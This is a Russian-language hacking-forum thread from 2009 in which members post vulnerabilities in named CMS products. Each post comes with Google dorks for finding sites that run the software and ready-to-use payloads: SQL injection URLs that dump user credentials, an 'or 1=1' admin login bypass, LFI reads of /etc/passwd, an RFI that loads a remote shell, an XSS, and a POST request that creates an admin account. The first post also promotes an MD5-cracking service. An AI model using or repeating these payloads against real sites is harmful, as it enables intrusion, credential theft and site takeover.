HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.04.2009, 14:35
halkfild
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
С нами: 10787366

Репутация: 2277
По умолчанию

Found : halkfild
Dork : "Powered By Aqua Cms"
Vendor: http://www.aquacms.net/
Advisory URL: http://crackfor.me/bugtraq/aquacms.v1.1.txt
Mail : bugtraq[d0g]crackfor.me


SQL-injections:
Need:
magic quotes = off


vuln file: /droplets/functions/base.php
vuln code:

PHP код:
65:// Check the status of the orders

if(isset($_COOKIE["userSID"])) {
$sqltable $sitename."_orders";
$selck $_COOKIE["userSID"];
mysql_select_db($database$dbconnect);
$query_cartcheck "SELECT SID FROM $sqltable WHERE SID = '$selck' AND status = 1";    
$cartcheck mysql_query($query_cartcheck$dbconnect) or die(mysql_error());
$row_cartcheck mysql_fetch_assoc($cartcheck);
$totalRows_cartcheck mysql_num_rows($cartcheck);

if (
$totalRows_cartcheck != 0) {
    
$user_ip_address $_SERVER['REMOTE_ADDR'];
    
$dt=date("YmdHis"); 
    
$UID="$dt$user_ip_address";
    
setcookie("userSID"$UIDtime()+36000);
}


PoC: COOKIE: userSID='[foo]

Auth bypass
Need:
magic quotes = off

vuln file: /admin/index.php
vuln code:

PHP код:
10:
if (isset(
$_POST['username']) == TRUE) {
    
$uusername $_POST['username'];
    
$upassword $_POST['password'];
    
$sqltable $sitename."_users";
    
mysql_select_db($database$dbconnect);
    
$query_getuser "
    SELECT * 
    FROM 
$sqltable 
    WHERE username = '
$uusername
    AND password = '
$upassword
    AND groups != '' 
    "
;
    
$getuser mysql_query($query_getuser$dbconnect) or die("Unable to select database");
    
$row_getuser mysql_fetch_assoc($getuser);
    
$totalRows_getuser mysql_num_rows($getuser);
    
    if (
$totalRows_getuser == 1) {
        
$uid $row_getuser['id'];
        
$uun $row_getuser['username'];
        
$ugr $row_getuser['groups'];
        
$setwsuser $uid.":".$uun.":".$ugr
        
//setcookie("wsuser", $setwsuser, time()+36000, '/');
        //header("Location: index.php");
    

    
// User logon: end


PoC: POST: username='[foo]
Exploit: POST: username=crackfor.me'+or+1=1+limit+1+--+


p.s. for cracking md5 hashes use http://crackfor.me - online md5 crack service (:
 
Ответить с цитированием

  #2  
Старый 16.04.2009, 15:38
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами: 10441826

Репутация: 1861


По умолчанию

Lil' CMS
download: http://www.lilcms.com/lilcms/lilcms2.zip
dork: "Developed from orginal code by Lil' CMS"

Произвольное чтение и запись файлов
уязвимый код:
PHP код:
if($_POST["select"] && $_POST["Submit"]=="Load") {
//Readfile
$text=file_get_contents($CPATH.$_POST["select"]);
}


if(
$_POST["editing"] && $_POST["Submit"]=="Update") {
//Write file
$filename $CPATH.$_POST["editing"];
$text=$_POST["textfield"];
$fp fopen ($filename"w");
$text stripslashes($text);
fwrite($fp$text);
fclose($fp);

эксплуатирование:
достаточно изменить POST-пакет, отсылаемый серверу, т.е. поправить значение переменной select, в случае чтения файла(select=../../../../../../../etc/passwd), и editing, в случае записи в файл(создает файл, если файл с таким именем отсутствует)

(с) Iceangel_

Последний раз редактировалось Iceangel_; 16.04.2009 в 15:41..
 
Ответить с цитированием

webylon cms v 2.5
  #3  
Старый 17.04.2009, 20:13
fker
Участник форума
Регистрация: 26.11.2008
Сообщений: 158
С нами: 9187097

Репутация: 158
По умолчанию webylon cms v 2.5

Found : fker
Vendor: http://webylon.ru/
Type vuln: SQL injection
Vulnerable scripts:
bigimg.cgi
place.cgi
bigimg_galery.cgi
Parameter:id

POC,s:
Код:
http://[target]/bigimg.cgi?id={SQL}
Код:
http://[target]/cgi/place.cgi?id={SQL}
Код:
http://[target]/bigimg_galery.cgi?id={SQL}
sample:
https://forum.antichat.ru/showpost.php?p=1229194&postcount=8915
 
Ответить с цитированием

уязвимости SCMSv1
  #4  
Старый 19.04.2009, 09:32
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами: 10441826

Репутация: 1861


По умолчанию уязвимости SCMSv1

Уязвимости SCMS
download: http://futurekast.com/fcms/php/SCMSv1.zip
dork: "Powered by SCMSv1"

LFI
уязвимый код:
PHP код:
    if (!isset($_GET['p'])) { // no page specified -> load default page
        
include("../SCMSv1/includes/default.txt");
    } else include(
"includes/" $_GET['p'] . ".txt"); 
эксплуатирование:
Код:
index.php?p=../../../../../../../etc/passwd%00
если стоят мк, используем альтернативу нуллбайту http://raz0r.name/articles/null-byte-alternative/

(с) Iceangel_
 
Ответить с цитированием

  #5  
Старый 20.04.2009, 21:16
[underwater]
Познающий
Регистрация: 29.03.2009
Сообщений: 87
С нами: 9010027

Репутация: 308
По умолчанию

Bahar Download Script
D

Download: http://www.aspdepo.org/indir2.asp?id=1085

Турки жгут))

Код:
http://www.site.com/patch/aspkat.asp?kid=28%20union+select+all+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+admin

ltaweb Alısveris Sistem

Download: http://www.aspindir.com/goster/5631

Код:
http://shop/urunler.asp?catno=38%20union+select+all+0,1,uname, upass,4,5,6,7,8,9,10,11,12+from+users
BloofoxCMS
Download: http://www.bloofox.com/download.21.html

magic_quotes_gpc = Off
register_globals = On

LFI:

Код:
http://site/plugins/spaw2/dialogs/dialog.php?lang=../../../../../../../../../../../../etc/passwd%00
wsCMS
Google dork: Powered by wsCMS

SQL Inj:
Код:
http://site.com/news.php?id=-1234+union+select+1,concat(username,char(58),user_ password)+from+phpbb_users+limit+1,1--
Blind SQL Inj:

Код:
http://site.com/news.php?id=1 and substring(@@version,1,1)=4
http://site.com/news.php?id=1 and substring(@@version,1,1)=5
Virtual War

Google Dork: Powered by Virtual War

Код:
http://site.com/extra/online.php?n=_member%20WHERE%20memberid=-999%20UNION%20SELECT%200,%43%4F%4E%43%41%54%28%6D% 65%6D%62%65%72%69%64%2C%30%78%33%41%2C%6E%61%6D%65 %2C%30%78%33%41%2C%70%61%73%73%77%6F%72%64%29%2C%3 2%0A%20FROM%20vwar_member%20%20/*
Online Universal Payment System System

Код:
http://site.com/index.php?read=../../../../../../../../../../etc/passwd

Последний раз редактировалось [underwater]; 20.04.2009 в 23:59..
 
Ответить с цитированием

  #6  
Старый 22.04.2009, 21:54
[underwater]
Познающий
Регистрация: 29.03.2009
Сообщений: 87
С нами: 9010027

Репутация: 308
По умолчанию

eXopera

Download: http://www.exopera.be/

Уязвимость в файле product.php:
Blind SQL Inj:

Код:
http://site.com/product.php?catid=1 and substring(@@version,1,1)=4
Код:
http://site.com/product.php?catid=1 and substring(@@version,1,1)=5

cpCommerce


Download: http://cpcommerce.cpradio.org/downloads.php

Уязвимость в файле document.php:
Blind SQL Inj:

Код:
http://site.com/document.php?id_document=1 and substring(@@version,1,1)=4
Код:
http://site.com/document.php?id_document=1 and substring(@@version,1,1)=5
 
Ответить с цитированием

CMSSite Vulnerabilities
  #7  
Старый 22.04.2009, 23:21
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами: 10077446

Репутация: 3965


По умолчанию CMSSite Vulnerabilities

CMSSite Vulnerabilities

Found by: Dimi4 [UASC]
Date: 22.04.09


XSS (search.php) :

Код:
http://localhost/CMSSite/search.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&x=0&y=0
LFI: admin.php

PHP код:
    if(file_exists("$admin_dir/".$_REQUEST["mode"].".php") &&  $_REQUEST["mode"] != "delete" &&  $_REQUEST["mode"] != "logout")
    {
        include(
"$admin_dir/".$_REQUEST["mode"].".php");
    } 
Код:
/admin.php?mode=[path]//////////////////[..]
 
Ответить с цитированием

  #8  
Старый 23.04.2009, 19:17
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию

Limeware CMS
Сайт: http://limeware-cms.com/

SQL-injection
При magic_quotes_gpc=off

Уязвимый код:
displayNews.php
PHP код:
. . .
 if (
strlen($_GET['id']) > 0) {
                
$this->id $_GET['id'];
            } else {
                
$this->id 0;  
. . .
 
$query sprintf("SELECT id,title,author,date,body FROM %s WHERE id = '%s'"$this->tblnews$this->id);
        
$this->newsResult $this->DB_executeQuery($query$this->newsLink);
. . . 
Эксплуатация:
Цитата:
site.com/index.php?type=news&block=1&id=22'+and+1=2+union+s elect+1,concat_ws(0x2F,username,password),3,4,5+fr om+tblusers--+
 
Ответить с цитированием

Уязвимости Ninja Blog
  #9  
Старый 26.04.2009, 18:00
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами: 10441826

Репутация: 1861


По умолчанию Уязвимости Ninja Blog

Уязвимости Ninja Blog
download: http://www.ninjadesigns.co.uk/enter/blog.zip
dork: "Powered by Ninja Designs"

RFI

/entries/index.php
уязвимый код:
PHP код:
 <?php
if (isset($_GET["cat"])) {
    
$page $_GET["cat"].'.txt';
        if (
file_exists($page))  {                               
            echo 
"<br /><a href=\"index.php\">< Back</a>";
            @include (
"$page");
эксплуатирование:
Код:
/entries/index.php?cat=ftp://login:pwd@host/shell.txt%00

(с) Iceangel_

Последний раз редактировалось Iceangel_; 26.04.2009 в 18:32..
 
Ответить с цитированием

  #10  
Старый 26.04.2009, 23:09
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами: 9837719

Репутация: 466
По умолчанию

TeamCal Pro Version 3.2.003
Downloads:http://www.lewe.com/index.php?option=com_docman&task=cat_view&gid=112& Itemid=45
Dork:Powered by TeamCal

можем добавить админа

уязвимый код

/addprofile.php
Код:
/**
 * Check if allowed 
 */
if (!checkAuth("admin")) {
   // Not authorized. Get outta here
   jsReload("index.php"); <- тут java-redirect!
}
эксплуатация:
Код:
/addprofile.php 
отправляем POST запрос типа
username=1234567&password=1234&password2=1234&lastname=&firstname=&title=&position=&idnumber=&phone=&mobile=&email=&birthday=&opt_gender=ut_male&uo_language=english&uo_defgroup=default&lbxNotifyGroup=All&opt_usertype=ut_admin&custom1=&custom2=&custom3=&custom4=&custom5=&customFree=&customPopup=&btn_add=Add
все
admin:1234567
pass:1234

(с)Rubaka
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.